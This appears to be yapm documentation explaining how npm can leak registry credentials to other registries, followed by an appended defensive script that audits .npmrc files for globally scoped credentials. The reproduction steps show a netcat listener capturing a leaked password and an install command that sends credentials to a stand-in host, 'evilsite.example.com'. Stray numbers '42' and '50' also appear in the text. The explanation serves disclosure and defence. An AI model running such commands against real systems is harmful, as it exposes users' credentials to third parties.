Registry-specific configuration: security fixes
----------------------------------------------

`npm` has one configuration for all registries. If you're using different registries, `npm` can leak your credentials from one registry to another. Also, a user can be tricked into exposing their credentials with a crafted command-line string.

`yapm` has a separate configuration for each registry, which means this flaw doesn't exist anymore. See [here](multireg-conf.md) for details about how it's done.

This means that if you have authenticated to one registry and then make a request to another, `npm` can expose sensitive information to that second registry. This matters most if you use multiple registries administered by different people.

Think about a browser that shares authentication info with all websites. If one website stores a cookie, your browser will send it with every request, to every website. If you only use one website, this approach is fine. But if you use several of them, this is a critical security flaw.

### This is how you can replicate this bug:

Authenticate yourself in the main registry:

```
$ npm adduser --registry http://registry.npmjs.org/
```

Create and publish a new package:

```
$ mkdir test ; cd test ; echo '{"name":"test","version":"0.0.0"}' > package.json
$ npm publish --registry http://localhost:8080/
```

Listen for all requests on some port in a separate terminal:

```
$ nc -l 8080
POST /_session HTTP/1.1
host: localhost:8080
accept: application/json
content-type: application/json
content-length: 40
Connection: keep-alive

{"name":"test","password":"test"}
```

Do you see it? `npm` is leaking your password to another registry, even though you never typed it explicitly.
42
### always-auth issues

It gets even worse with the `always-auth` setting turned on.

```
$ npm install foobar --reg http://evilsite.example.com/ --always-auth=true
```
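A defender-side check for both problems above (the shared credentials and the global `always-auth` flag), added here as an example that is not part of yapm or npm: it parses an `.npmrc`-style config and flags credential settings that are set globally rather than scoped to one registry. It assumes npm's key naming, where a bare key such as `_auth` applies to every registry and a key prefixed with `//host/:` applies only to that registry; the sample config is constructed.

```javascript
// Added example (not yapm or npm code): audit an .npmrc-style config for
// credential settings that apply to every registry instead of one.
// Assumes npm's key naming: a bare key such as `_auth` is global, while a key
// prefixed with a registry path, e.g. `//registry.example.com/:_auth`, is
// scoped to that registry and is only sent there.

// Keys that carry credentials, or force them to be sent (`always-auth`).
const CREDENTIAL_KEYS = new Set(['_auth', '_password', 'username', 'always-auth']);

// Parse `key=value` lines; skip blank lines and `#`/`;` comments.
function parseNpmrc(text) {
  const entries = [];
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('#') || line.startsWith(';')) continue;
    const eq = line.indexOf('=');
    if (eq < 0) continue;
    entries.push({ key: line.slice(0, eq).trim(), value: line.slice(eq + 1).trim() });
  }
  return entries;
}

// Return one finding per credential setting that is not scoped to a registry.
function auditNpmrc(text) {
  const findings = [];
  for (const { key, value } of parseNpmrc(text)) {
    // Scoped form: "//host[:port][/path]/:setting" applies to that registry only.
    const scoped = /^(\/\/.+?\/):(.+)$/.exec(key);
    const setting = (scoped ? scoped[2] : key).toLowerCase();
    if (!CREDENTIAL_KEYS.has(setting) || scoped) continue;
    // A global `always-auth=false` is harmless; only a true value forces auth.
    if (setting === 'always-auth' && value.toLowerCase() !== 'true') continue;
    findings.push(`global "${key}" is sent to every registry; scope it as //<registry-host>/:${key}`);
  }
  return findings;
}

// Constructed sample: credentials set globally, plus one properly scoped token.
const SAMPLE_NPMRC = [
  'registry=http://localhost:8080/',
  '_auth=dXNlcjpwYXNz', // constructed base64 of "user:pass"
  'always-auth=true',
  '//registry.npmjs.org/:_authToken=constructed-token',
].join('\n');

console.log(auditNpmrc(SAMPLE_NPMRC).join('\n'));
```

Running it on the sample reports the global `_auth` and `always-auth` lines and stays silent about the scoped token.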
50